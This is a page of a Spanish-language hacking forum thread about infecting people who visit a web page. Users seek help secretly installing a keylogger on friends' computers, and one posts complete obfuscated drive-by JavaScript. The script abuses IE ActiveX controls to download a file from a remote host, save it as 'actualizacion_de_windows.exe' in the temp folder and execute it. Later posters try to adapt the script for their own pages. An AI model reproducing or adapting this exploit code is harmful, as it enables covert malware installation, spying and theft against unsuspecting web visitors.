Páginas: 1 2 3 [4] 5 
|
 |
|
 Autor
|
Tema: Infecion visitando pagina web (Leído 7521 veces)
|
|
|
|
|
Isirius
Wiki
 Desconectado
Mensajes: 2.342
|
Bueno leyendo todas las paginas del tema mm he deducido que estamos en un codigo el problema es que solo funciona si esta asociado a un .cab o al .cab esa es mi primera pregunta segundo y que posibilidades tiene un.cab es como un bat o algo asi y otra cosa tan dificil es crearlo que no podemos hacerlo entre todos y asi no tendiramos problemas buenos eguire mirando el tema jeje.
|
|
|
|
|
En línea
|
|
|
|
Pipilin
Desconectado
Mensajes: 18
|
Hola a todos, el tema esta muy interesante, yo por lo generan envio el Ardamax keylogger para ver lo que algunos amigos mio hacen, se podria preparar un server del ardamax keylogger y prepararlo tal cual se auto instale solo haciendo click en un link ?
Si es asi me gustaria que alguien que maneje bien el tema me ayudara.
Esperando repuestas me despido
|
|
|
|
|
En línea
|
|
|
|
Molasar
 Conectado
Mensajes: 27
|
La infección visitando una página web, normalmente se logra con exploits que realizan el "download and run" del código malicioso. Tengo uno que funciona bien con IE5 e IE6, pero no con los IE6 que tengan instalado el SP2, funciona sólo hasta SP1. El camino más seguro sería investigar acerca de el exploit llamado Web Attacker que están usando los rusos y modificarlo para nuestro uso. Cualquier cosa que vaya averiguando al respecto, la pondré aquí. |
|
|
|
|
En línea
|
|
|
|
|
kartor
|
Molasar podrias poner el exploit? Gracias  |
|
|
|
|
En línea
|
|
|
|
ismael_34
Desconectado
Mensajes: 5
|
hola amigos creo q este hilo lo tenesis un poco olvidado con lo interezante q es e estado desmenuzando el codigo de esta web KEYGEN.US y al final solo me quedo esto <html> <iframe src=" http://www.vevdqimkcm.info/c/2235/counter21.php"</iframe> parece ser q esto es lo q ace q se descarge los server y los ejecute lo e estado probando con xp sp2 sin actualizar y con dos navegadores distintos el iexplorte y el avant browser con los dos navegadores se descargaban los server,gracias al kerio no llegaron a conectar ninguno de ellos pero segun e visto la descarga la ace con php,y ya con php me pierdo asi q lo pego aqui para ver si alguno se en rolla y nos explica algo del tema chauuu  |
|
|
|
|
En línea
|
|
|
|
chiquitalucia
Desconectado
Mensajes: 12
|
Esto hay q subirlo , es interesante  ... lei que se puede pero es solo en ie ... pero algo es algo. alguien sabe como? Gracias Lucy |
|
|
|
|
En línea
|
|
|
|
nhaalclkiemr
Desconectado
Mensajes: 1.644
Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92
|
Primero, decir k IE es muy vulnerable a muchos bugs, yo uso firefox y tengo activado el modulo IMON del NOD32 y nunca he tenido problemas... Despues decir k si kereis provar esas paginas provarlas en las maquinas virtuales...que para algo estan  Y por ultimo decir k si lo k kieres es navegar a salvo por internet lo mejor es ejecutar intenet explorer con privilegios reducidos...darle con el boton derecho al acceso directo de IE o Firefox y pulsais en "ejecutar como" despues marcais la casilla donde pone algo de proteger al ekipo o no se k y vuestro ekipo sera mucho menos vulnerable... Saludos  |
|
|
|
|
En línea
|
|
|
|
|
||MadAntrax||
|
Me he mirado la infección a través de archivos CAB. El problema no está en crear el CAB (que eso e smuy facil) si no programar el control EXE ActiveX que hay en el interior del CAB (un archivo con extensión OCX). Por lo que he leido, es muy facil de hacerlo en VB6, ya que permite directamente crear controles "EXE ActiveX", pero no me he podido poner aun. Volviendo al tema de las web's fraudulentas, una muy famosa es la de WinAntivirus Pro 2006 y sus variantes (ojo no le deis click!) www.winantivirus.comwww.errorsafe.comwww.winfixer.cometc. Creo recordar que esta web explotaba un bug al cargar un applet en Java 1.4 e inferiores. |
|
|
|
|
En línea
|
|
|
|
hackeen
Desconectado
Mensajes: 12
=Hackeen=
|
sí, crear lo .cab es realmente fácil mismo! más como que hago para configurar en el html para poder dara función de ejecutar el archivo dentro de él ? nunca conseguí hallar esa respuesta  |
|
|
|
|
En línea
|
=BHT=
|
|
|
ismael_34
Desconectado
Mensajes: 5
|
hola amigos al fin, e consegido meter un exe por web el codigo lo e pillado en KEYGEN.US lo e probado en varios navegadores y en algunos cuela,por ejemplo el q yo e usado iexploret del sp2 sin actualizar es la v 6 en otros pc de amigotes mios no a llegado a entrar ,tampoco en firefox, lo e probado en mi maquina y lo para,asi q la conclusion q e sacado es q el codigo este q se usa para bajar el server y ejecutarlo en la carpeta temp,no es la gran panacea ,pero algo es algo http://penelope-cruz.atspace.com/index.html la página esta hecha de la forma siguiente el index es una página de marcos o frames q habre otro index3 y el cual baja el server bueno no doy mas pistas el q sea espabilado podra usar el codigo ojo mi página tiene un server si veo q caeis alguno,os lo quitare,jejejeje suerte |
|
|
|
|
En línea
|
|
|
|
-Lozano-
Desconectado
Mensajes: 10
|
Bueno perdonen por revivir este tema tan viejo pero me intereso. Ya vi el codigo fuente de la pagina. de esta es http://penelope-cruz.atspace.com/index.html<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta name="GENERATOR" content="Microsoft FrontPage 5.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <title>Pagina nueva 12</title> </head> <frameset rows="1%,*" framespacing="0" border="0" frameborder="0"> <frame name="superior" src="http://penelope-cruz.atspace.com/index3.html" scrolling="no" noresize> <frame name="inferior" src="http://wwwme.org/web.php?id=9139&pag=6732"> <noframes> <body> <p>Esta página usa marcos, pero su explorador no los admite.</p> </body> </noframes> </frameset> </html> esta pagina llama a otra que es el index3.html y aca esta el codigo fuente, en definitiva esta es la que infecta. <HTML>
<HEAD>
<TITLE>404 error - Document Not Found</TITLE>
</HEAD>
<BODY>
<SCRIPT Language="javascript" type="text/javascript">
function xvtdkumea(ovpq, jiyg) {
var uxyr = null;
try { eval('uxyr = ovpq.CreateObject(jiyg)') }catch(ewcaemy){}
if (! uxyr) {
try { eval('uxyr = ovpq.CreateObject(jiyg, "")') }catch(ewcaemy){}
}
if (! uxyr) {
try { eval('uxyr = ovpq.CreateObject(jiyg, "", "")') }catch(ewcaemy){}
}
if (! uxyr) {
try { eval('uxyr = ovpq.GetObject("", jiyg)') }catch(ewcaemy){}
}
if (! uxyr) {
try { eval('uxyr = ovpq.GetObject(jiyg, "")') }catch(ewcaemy){}
}
if (! uxyr) {
try { eval('uxyr = ovpq.GetObject(jiyg)') }catch(ewcaemy){}
}
return(uxyr);
}
function yegvzhj(zrmsp) {
rwnjg = "GE"+"T";
var qpxsy = "http://penelope-cruz.atspace.com/counter21.jpg?a=3&c=3";
bvs = "X"+"MLH"+"TTP";
var fcuj = zrmsp.CreateObject("Scr"+"i"+"p"+"t"+"ing."+"File"+"S"+"ystemO"+"bje"+"c"+"t", "")
mozwi = "S"+"h"+"e"+"l"+"l";
yva = "A"+"D"+"O"+"D"+"B"
rjxq = "actualizacion_de_windows"+".exe";
fcr = ".";
mlyl = "G"+"ET";
ndtia = "Applica"+"tion";
rgend = ".";
tex = "S"+"t"+"r"+"ea"+"m";
fdgfoay = "MSXML"+"2";
var cenfw = xvtdkumea(zrmsp, mozwi+fcr+ndtia);
xninaqr = "Mi"+"c"+"r"+"oso"+"ft";
uevwuao = 12+15;
xhwznv = "G"+"E"+"T";
whkx = "X"+"M"+"LHTTP";
var qykm = xvtdkumea(zrmsp, yva+rgend+tex);
cperadi = "MS"+"X"+"ML2";
bvuivi = rwnjg;
var uyl = null;
eoqvfo = "Se"+"rver";
rjxq = fcuj.BuildPath(fcuj.GetSpecialFolder(2), rjxq);
cva = "XM"+"LH"+"T"+"TP";
qykm.Mode = 3;
try {
juf = "d"+"wom";
uyl = xvtdkumea(zrmsp, xninaqr+fcr+bvs);
uyl.open(rwnjg, qpxsy, false);
} catch(ewcaemy) {
try {
uyl = xvtdkumea(zrmsp, fdgfoay+rgend+whkx);
uyl.open(mlyl, qpxsy, false);
} catch(uevwuao) {
try {
uyl = xvtdkumea(zrmsp, cperadi+fcr+eoqvfo+cva);
uyl.open(xhwznv, qpxsy, false);;
} catch(juf) {
try {
uyl=new XMLHttpRequest();
uyl.open(bvuivi, qpxsy, false);
} catch(eoqvfo){
return 0;
}
}
}
}
qykm.Type = 1;
uyl.send(null);
vxtsf = uyl.responseBody;
if (4+5+1+1+1+10+1+1+5 > 7+6+8+8+1+1) {
alert("ewcaemy");
} else {
qykm.Open();
qykm.Write(vxtsf);
if (5+1+1+4+4+1+1+2 > 2+1+18+3) {
alert("cva");
} else {
qykm.SaveToFile(rjxq, 2);
}
}
cenfw.ShellExecute(rjxq);
return 1;
}
var i = 0;
var tmqv = new Array(
"{"+"B"+"D96"+"C"+"5"+"5"+"6"+"-6"+"5"+"A"+"3-"+"11D0-"+"983A-0"+"0C0"+"4"+"F"+"C"+"29E36"+"}",
"{"+"A"+"B9BCED"+"D-EC7"+"E"+"-"+"4"+"7"+"E"+"1"+"-"+"9"+"322-D4"+"A"+"2"+"1"+"0"+"6"+"17116}",
"{"+"0"+"0"+"0"+"6F0"+"33"+"-0000-00"+"0"+"0-C000"+"-"+"0"+"00000"+"0"+"0"+"0046"+"}",
"{"+"0"+"0"+"0"+"6"+"F"+"0"+"3A-0000-"+"0000-C"+"000"+"-00000"+"0"+"0"+"000"+"4"+"6"+"}",
"{"+"6"+"e"+"32070a-7"+"66d-4ee6-8"+"7"+"9c-dc"+"1"+"fa9"+"1d2fc3"+"}",
"{6414512B-B978"+"-"+"4"+"51D-A0D8-F"+"CFDF33E833C}",
"{"+"7F5B7F"+"63-F06F-4331-8A26-3"+"39E03C0AE3"+"D}",
"{"+"06723E0"+"9"+"-F4"+"C"+"2"+"-43"+"c8-835"+"8-09FCD1DB0766}",
"{639F725F"+"-1B2D-4831-A9FD-874847682010}",
"{"+"B"+"A"+"0"+"1"+"8"+"5"+"9"+"9-1DB"+"3-44"+"f"+"9-83B4"+"-"+"4"+"61454"+"C"+"8"+"4"+"BF8"+"}",
"{D0C07D5"+"6-7C69-43F"+"1-B4"+"A0-25F5A1"+"1F"+"AB1"+"9}",
"{"+"E"+"8C"+"C"+"CDDF-"+"C"+"A"+"28-49"+"6b-B050"+"-"+"6C0"+"7C9"+"6"+"2476B"+"}",
null);
good = 0;
while (tmqv[i]) {
var uwuj = null;
n = 3+7;
if (tmqv[i].substring(0,1) == "{") {
uwuj = document.createElement("o"+"b"+"ject");
rwejb = 1+1+1+2+1;
uwuj.setAttribute("c"+"lassid", "cl"+"sid"+":" + tmqv[i].substring(1, tmqv[i].length - 1));
} else {
try { uwuj = new ActiveXObject(tmqv[i]); } catch(ewcaemy){}
}
if (uwuj) {
try {
var qvwz = xvtdkumea(uwuj, "She"+"ll"+"."+"App"+"l"+"ica"+"tio"+"n");
if (qvwz) { good = yegvzhj(uwuj); if (good) {break;} }
} catch(ewcaemy) {}
}
i++;
}
if (good == 0) {
c = "http://penelope-cruz.atspace.com/counter21.jpg?b=4&k=1";
window.location = c;
}
</SCRIPT> Lo logre ver con un programa que me hice que esta aca http://www.hackerslibres.es/foro/index.php?topic=370.0Solo lo quice poner para los que le interese este tema lo puedan ver y ponerlo en practica, espero no molestar a nadie con esto Lozano  |
|
|
|
|
En línea
|
|
|
|
ginix
Desconectado
Mensajes: 2
|
Por lo que veo hay dos sitios donde llama a la pagina web otra vez con dos variables pasadas mediante GET. var qpxsy = " http://penelope-cruz.atspace.com/counter21.jpg?a=3&c=3"; y la otra aqui... if (good == 0) { c = " http://penelope-cruz.atspace.com/counter21.jpg?b=4&k=1"; window.location = c; } y luego el nombre de un archivo que puedo presuponer por la alerta que me da el antivirus que es un trojan dowloader. rjxq = "actualizacion_de_windows"+".exe"; he intentado con ese codigo crear una pagina para mi cambiando las direcciones por las mias y cambiando la variable que apunta al archivo de actualizacion_de_windows.exe a calc.exe para que baje y ejecute la calculadora.. pero no ha habido suerte.Parece ser que en esa retahila de letras y numeros que es el array o en algun sitio mas hace la verdadera llamada al archivo (al trojan downloader) porque ejecutandolo me sigue dando el mismo mensaje de alerta el antivirus y si lo ignoro no ejecuta calc.exe ni nada... |
|
|
|
|
En línea
|
|
|
|
infiernito164
Desconectado
Mensajes: 25
|
me he quebrado la cabeza tratando de analizar esto y no le doy por lo que veo el exe se hace en dos partes pero no se que onda alguien me ayuda
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 2 3 [4] 5 
|
|
|
 |
